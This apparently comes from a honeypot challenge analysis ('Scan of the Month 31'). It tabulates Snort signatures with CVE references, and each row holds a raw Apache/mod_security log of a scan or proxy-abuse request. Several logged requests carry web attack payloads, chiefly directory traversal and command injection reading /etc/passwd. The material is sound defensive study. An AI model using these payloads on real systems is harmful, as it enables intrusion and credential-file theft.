Scan of the Month 31 Analysis by Christophe GRENIER

The obvious attacks are proxy abuse, web attack and brute force attacks but there are a lot more (about 400): 6800-50=6750

SnortID	Link	Category	Attack name	Example
509	arachNIDS 300	web-application-attack	WEB-MISC PCCS mysql database admin tool access	Request: 217.160.165.173 - - [Fri Mar 12 22:37:23 2004] "GET /pccsmysqladm/incs/dbconnect.inc HTTP/1.1" 403 315 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/pccsmysqladm ---------------------------------------- GET /pccsmysqladm/incs/dbconnect.inc HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: 192.168.1.103 Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
803	CAN-2001-0253 BID2314	web-application-attack	WEB-CGI HyperSeek hsx.cgi directory traversal attempt	Request: 217.160.165.173 - - [Fri Mar 12 22:37:39 2004] "GET /cgi-bin/hsx.cgi?show=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 578 Handler: cgi-script Error: mod_security: Invalid character detected [0] ---------------------------------------- GET /cgi-bin/hsx.cgi?show=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Invalid character detected mod_security-action: 200 HTTP/1.1 200 OK Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
805	Nessus 10304 CVE-2000-0127 arachNIDS 467	attempted-user	WEB-CGI webspeed access	Request: 217.160.165.173 - - [Fri Mar 12 22:42:09 2004] "GET /scripts/wsisa.dll/WService=anything?WSMadmin HTTP/1.1" 200 578 Handler: (null) Error: mod_security: pausing [/scripts/wsisa.dll/WService=anything] for 50000 ms ---------------------------------------- GET /scripts/wsisa.dll/WService=anything?WSMadmin HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: 192.168.1.103 Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Access denied with code 200. Pattern match "WSMadmin" at THE_REQUEST. mod_security-action: 200 HTTP/1.1 200 OK Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
806	BID1668 arachNIDS 462 CVE-2000-0853	attempted-recon	WEB-CGI yabb directory traversal attempt	Request: 217.160.165.173 - - [Fri Mar 12 22:41:54 2004] "GET /cgi-bin/YaBB.pl?board=news&action=display&num=../../../../../../etc/passwd%00 HTTP/1.1" 200 578 Handler: cgi-script Error: mod_security: Invalid character detected [0] ---------------------------------------- GET /cgi-bin/YaBB.pl?board=news&action=display&num=../../../../../../etc/passwd%00 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Invalid character detected mod_security-action: 200 HTTP/1.1 200 OK Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
807	BID649 Nessus 10321 CVE-1999-0953 arachNIDS 463	attempted-recon	WEB-CGI /wwwboard/passwd.txt access	Request: 217.160.165.173 - - [Fri Mar 12 22:41:17 2004] "GET /wwwboard/passwd.txt HTTP/1.1" 200 578 Handler: (null) Error: mod_security: pausing [/wwwboard/passwd.txt] for 50000 ms ---------------------------------------- GET /wwwboard/passwd.txt HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: 192.168.1.103 Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Access denied with code 200. Pattern match "/wwwboard/passwd\.txt" at THE_REQUEST. mod_security-action: 200 HTTP/1.1 200 OK Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
808	Nessus 10592 BID2166 arachNIDS 473	attempted-recon	WEB-CGI webdriver access	Request: 217.160.165.173 - - [Fri Mar 12 22:38:58 2004] "GET /cgi-bin/webdriver HTTP/1.1" 403 301 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/webdriver ---------------------------------------- GET /cgi-bin/webdriver HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: 192.168.1.103 Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
810	Nessus 10306 arachNIDS 466 CAN-1999-1063	attempted-recon	WEB-CGI whois_raw.cgi access	Request: 217.160.165.173 - - [Fri Mar 12 22:42:07 2004] "GET /cgi-bin/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd HTTP/1.1" 200 578 Handler: cgi-script Error: mod_security: Invalid character detected [10] ---------------------------------------- GET /cgi-bin/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Invalid character detected mod_security-action: 200 HTTP/1.1 200 OK Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
812	arachNIDS 470 CVE-2000-0282	attempted-recon	WEB-CGI webplus version access	Request: 217.160.165.173 - - [Fri Mar 12 22:41:50 2004] "GET /cgi-bin/webplus?about HTTP/1.1" 403 299 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/webplus ---------------------------------------- GET /cgi-bin/webplus?about HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
813	arachNIDS 471 CVE-2000-0282	web-application-attack	WEB-CGI webplus directory traversal	Request: 217.160.165.173 - - [Fri Mar 12 22:38:04 2004] "GET /webplus?script=/../../../../etc/passwd HTTP/1.1" 403 291 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/webplus ---------------------------------------- GET /webplus?script=/../../../../etc/passwd HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
815	Nessus 10301 BID2077 arachNIDS 469 CVE-1999-0196	attempted-recon	WEB-CGI websendmail access	Request: 217.160.165.173 - - [Fri Mar 12 22:40:09 2004] "GET /cgi-bin/websendmail HTTP/1.1" 200 578 Handler: cgi-script Error: mod_security: pausing [/cgi-bin/websendmail] for 50000 ms ---------------------------------------- GET /cgi-bin/websendmail HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: 192.168.1.103 Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Access denied with code 200. Pattern match "/websendmail" at THE_REQUEST. mod_security-action: 200 HTTP/1.1 200 OK Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
819	CVE-2001-0021	attempted-recon	WEB-CGI mmstdod.cgi access	Request: 217.160.165.173 - - [Fri Mar 12 22:41:46 2004] "GET /cgi-bin/mmstdod.cgi?ALTERNATE_TEMPLATES=\|%20echo%20"Content-Type:%20text%2Fhtml"%3Becho%20""%20%3B%20id%00 HTTP/1.1" 403 303 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/mmstdod.cgi ---------------------------------------- GET /cgi-bin/mmstdod.cgi?ALTERNATE_TEMPLATES=\|%20echo%20"Content-Type:%20text%2Fhtml"%3Becho%20""%20%3B%20id%00 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
820	BID2388 CVE-2000-0975	web-application-attack	WEB-CGI anaconda directory transversal attempt	Request: 217.160.165.173 - - [Fri Mar 12 22:39:15 2004] "GET /cgi-bin/apexec.pl?etype=odp&template=../../../../../../../../../etc/passwd%00.html&passurl=/category/ HTTP/1.1" 200 578 Handler: cgi-script Error: mod_security: Invalid character detected [0] ---------------------------------------- GET /cgi-bin/apexec.pl?etype=odp&template=../../../../../../../../../etc/passwd%00.html&passurl=/category/ HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Invalid character detected mod_security-action: 200 HTTP/1.1 200 OK Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
823	CVE-2000-0670	attempted-recon	WEB-CGI cvsweb.cgi access	Request: 217.160.165.173 - - [Fri Mar 12 22:38:19 2004] "GET /cvsweb.cgi/ HTTP/1.1" 403 295 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/cvsweb.cgi ---------------------------------------- GET /cvsweb.cgi/ HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
824	arachNIDS 232 BID2250 CAN-1999-0238	attempted-recon	WEB-CGI php.cgi access	Request: 217.160.165.173 - - [Fri Mar 12 22:42:33 2004] "GET /php.cgi?/etc/passwd HTTP/1.1" 403 291 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/php.cgi ---------------------------------------- GET /php.cgi?/etc/passwd HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
827	CVE-1999-0266 BID1995	attempted-recon	WEB-CGI info2www access	Request: 217.160.165.173 - - [Fri Mar 12 22:41:44 2004] "GET /cgi-bin/info2www HTTP/1.1" 403 300 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/info2www ---------------------------------------- GET /cgi-bin/info2www HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
829	BID686 CVE-1999-0045 arachNIDS 224 Nessus 10165	attempted-recon	WEB-CGI nph-test-cgi access	Request: 217.160.165.173 - - [Fri Mar 12 22:40:06 2004] "GET /cgi-bin/nph-test-cgi HTTP/1.1" 200 578 Handler: cgi-script Error: mod_security: pausing [/cgi-bin/nph-test-cgi] for 50000 ms ---------------------------------------- GET /cgi-bin/nph-test-cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: 192.168.1.103 Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Access denied with code 200. Pattern match "/nph-test-cgi" at THE_REQUEST. mod_security-action: 200 HTTP/1.1 200 OK Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
830	CAN-1999-1177	attempted-recon	WEB-CGI NPH-publish access	Request: 217.160.165.173 - - [Fri Mar 12 22:40:08 2004] "GET /cgi-bin/nph-publish.cgi HTTP/1.1" 200 578 Handler: cgi-script Error: mod_security: pausing [/cgi-bin/nph-publish.cgi] for 50000 ms ---------------------------------------- GET /cgi-bin/nph-publish.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: 192.168.1.103 Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Access denied with code 200. Pattern match "/nph-publish" at THE_REQUEST. mod_security-action: 200 HTTP/1.1 200 OK Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
833	BID2024 CAN-1999-0467	attempted-recon	WEB-CGI rguest.exe access	Request: 24.127.175.68 - - [Sat Mar 13 14:49:00 2004] "GET http://amateur-facials.com/1850/20202/index.html/cgi-bin/rguest.exe;dunno;RainM; HTTP/1.0" 200 566 Handler: proxy-server Error: mod_security: pausing [http://amateur-facials.com/1850/20202/index.html/cgi-bin/rguest.exe;dunno;RainM;] for 50000 ms ---------------------------------------- GET http://amateur-facials.com/1850/20202/index.html/cgi-bin/rguest.exe;dunno;RainM; HTTP/1.0 Cache-Control: no-cache Connection: close Host: amateur-facials.com Pragma: no-cache Proxy-Connection: keep-alive Referer: http://amateur-facials.com/1850/20202/index.html/cgi-bin/rguest.exe;dunno;RainM; User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) mod_security-message: Access denied with code 200. Pattern match "/rguest\.exe" at THE_REQUEST. mod_security-action: 200 HTTP/1.0 200 OK Connection: close Content-Type: text/html; charset=iso-8859-1
835	CVE-1999-0070 Nessus 10282	attempted-recon	WEB-CGI test-cgi access	Request: 217.160.165.173 - - [Fri Mar 12 22:37:54 2004] "GET /test-cgi?/* HTTP/1.1" 403 292 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/test-cgi ---------------------------------------- GET /test-cgi?/* HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
836	CAN-1999-1479	attempted-recon	WEB-CGI textcounter.pl access	Request: 217.160.165.173 - - [Fri Mar 12 22:40:31 2004] "GET /cgi-bin/textcounter.pl HTTP/1.1" 403 306 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/textcounter.pl ---------------------------------------- GET /cgi-bin/textcounter.pl HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
837	Nessus 10291 CVE-1999-0177	attempted-recon	WEB-CGI uploader.exe access	Request: 217.160.165.173 - - [Fri Mar 12 22:40:52 2004] "GET /cgi-win/uploader.exe HTTP/1.1" 200 578 Handler: (null) Error: mod_security: pausing [/cgi-win/uploader.exe] for 50000 ms ---------------------------------------- GET /cgi-win/uploader.exe HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: 192.168.1.103 Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Access denied with code 200. Pattern match "/uploader\.exe" at THE_REQUEST. mod_security-action: 200 HTTP/1.1 200 OK Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
838	Nessus 10300 CVE-1999-0176 BID2058 arachNIDS 472	attempted-recon	WEB-CGI webgais access	Request: 217.160.165.173 - - [Fri Mar 12 22:41:30 2004] "GET /cgi-bin/webgais HTTP/1.1" 403 299 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/webgais ---------------------------------------- GET /cgi-bin/webgais HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: 192.168.1.103 Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
839	Nessus 10071 CVE-1999-0612 arachNIDS 221	attempted-recon	WEB-CGI finger access	Request: 217.160.165.173 - - [Fri Mar 12 22:40:32 2004] "GET /cgi-bin/finger HTTP/1.1" 403 298 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/finger ---------------------------------------- GET /cgi-bin/finger HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: 192.168.1.103 Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
840	CAN-1999-1374	attempted-recon	WEB-CGI perlshop.cgi access	Request: 217.160.165.173 - - [Fri Mar 12 22:45:40 2004] "GET /cgi-bin/perlshop.cgi HTTP/1.1" 403 304 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/perlshop.cgi ---------------------------------------- GET /cgi-bin/perlshop.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=43 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
842	BID2026 CVE-1999-0147 Nessus 10095	attempted-recon	WEB-CGI aglimpse access	Request: 217.160.165.173 - - [Fri Mar 12 22:37:41 2004] "GET /cgi-bin/aglimpse HTTP/1.1" 200 578 Handler: cgi-script Error: mod_security: pausing [/cgi-bin/aglimpse] for 50000 ms ---------------------------------------- GET /cgi-bin/aglimpse HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: 192.168.1.103 Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Access denied with code 200. Pattern match "/aglimpse" at THE_REQUEST. mod_security-action: 200 HTTP/1.1 200 OK Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
844	CAN-1999-1374	attempted-recon	WEB-CGI args.bat access	Request: 217.160.165.173 - - [Fri Mar 12 22:38:39 2004] "GET /cgi-dos/args.bat HTTP/1.1" 403 300 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/cgi-dos ---------------------------------------- GET /cgi-dos/args.bat HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
845	CAN-1999-1072	attempted-recon	WEB-CGI AT-admin.cgi access	Request: 217.160.165.173 - - [Fri Mar 12 22:45:09 2004] "GET /cgi-bin/AT-admin.cgi HTTP/1.1" 200 578 Handler: cgi-script Error: mod_security: pausing [/cgi-bin/AT-admin.cgi] for 50000 ms ---------------------------------------- GET /cgi-bin/AT-admin.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Access denied with code 200. Pattern match "/AT-admin\.cgi" at THE_REQUEST. mod_security-action: 200 HTTP/1.1 200 OK Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
846	BID1469 CVE-1999-0937	attempted-recon	WEB-CGI bnbform.cgi access	Request: 217.160.165.173 - - [Fri Mar 12 22:45:46 2004] "GET /cgi-bin/bnbform.cgi HTTP/1.1" 403 303 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/bnbform.cgi ---------------------------------------- GET /cgi-bin/bnbform.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=82 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
847	BID1975 CVE-1999-0146	attempted-recon	WEB-CGI campas access	Request: 217.160.165.173 - - [Fri Mar 12 22:37:39 2004] "GET /cgi-bin/campas HTTP/1.1" 403 298 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/campas ---------------------------------------- GET /cgi-bin/campas HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: 192.168.1.103 Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
852	BID2024 CAN-1999-0467	attempted-recon	WEB-CGI wguest.exe access	Request: 24.127.175.68 - - [Sat Mar 13 14:41:48 2004] "GET http://brazilian-transsexuals.com/members//cgi-bin/wguest.exe;dunno;RainM; HTTP/1.0" 200 566 Handler: proxy-server Error: mod_security: pausing [http://brazilian-transsexuals.com/members//cgi-bin/wguest.exe;dunno;RainM;] for 50000 ms ---------------------------------------- GET http://brazilian-transsexuals.com/members//cgi-bin/wguest.exe;dunno;RainM; HTTP/1.0 Cache-Control: no-cache Connection: close Host: brazilian-transsexuals.com Pragma: no-cache Proxy-Connection: keep-alive Referer: http://brazilian-transsexuals.com/members//cgi-bin/wguest.exe;dunno;RainM; User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) mod_security-message: Access denied with code 200. Pattern match "/wguest\.exe" at THE_REQUEST. mod_security-action: 200 HTTP/1.0 200 OK Connection: close Content-Type: text/html; charset=iso-8859-1
853	CVE-1999-0149 arachNIDS 234 BID373 Nessus 10317	attempted-recon	WEB-CGI wrap access	Request: 217.160.165.173 - - [Fri Mar 12 22:39:13 2004] "GET /cgi-bin/wrap HTTP/1.1" 403 296 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/wrap ---------------------------------------- GET /cgi-bin/wrap HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: 192.168.1.103 Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
854	BID2020	attempted-recon	WEB-CGI classifieds.cgi access	Request: 217.160.165.173 - - [Fri Mar 12 22:45:34 2004] "GET /cgi-bin/classifieds.cgi HTTP/1.1" 403 307 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/classifieds.cgi ---------------------------------------- GET /cgi-bin/classifieds.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=95 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
857	Nessus 10067 BID2056 CVE-1999-0262	web-application-activity	WEB-CGI faxsurvey access	Request: 217.160.165.173 - - [Fri Mar 12 22:41:54 2004] "GET /cgi-bin/faxsurvey?cat%20/etc/passwd HTTP/1.1" 403 301 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/faxsurvey ---------------------------------------- GET /cgi-bin/faxsurvey?cat%20/etc/passwd HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
858	CAN-1999-1154	attempted-recon	WEB-CGI filemail access	Request: 24.127.175.68 - - [Sat Mar 13 15:03:45 2004] "GET http://members.dynamix.net/movies.html/cgi-bin/filemail.pl;dunno;RainM; HTTP/1.0" 200 566 Handler: proxy-server Error: mod_security: pausing [http://members.dynamix.net/movies.html/cgi-bin/filemail.pl;dunno;RainM;] for 50000 ms ---------------------------------------- GET http://members.dynamix.net/movies.html/cgi-bin/filemail.pl;dunno;RainM; HTTP/1.0 Cache-Control: no-cache Connection: close Host: members.dynamix.net Pragma: no-cache Proxy-Connection: keep-alive Referer: http://members.dynamix.net/movies.html/cgi-bin/filemail.pl;dunno;RainM; User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) mod_security-message: Access denied with code 200. Pattern match "/filemail\.pl" at THE_REQUEST. mod_security-action: 200 HTTP/1.0 200 OK Connection: close Content-Type: text/html; charset=iso-8859-1
861	CVE-2000-0012 Nessus 10296 arachNIDS 210 CVE-1999-0276 BID591	attempted-recon	WEB-CGI w3-msql access	Request: 217.160.165.173 - - [Fri Mar 12 22:47:11 2004] "GET /cgi-bin/w3-msql/index.html HTTP/1.1" 403 310 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/w3-msql ---------------------------------------- GET /cgi-bin/w3-msql/index.html HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
862	CA-1996-11	attempted-recon	WEB-CGI csh access	Request: 217.160.165.173 - - [Fri Mar 12 22:38:39 2004] "GET /cgi-bin/csh HTTP/1.1" 403 295 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/csh ---------------------------------------- GET /cgi-bin/csh HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=98 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
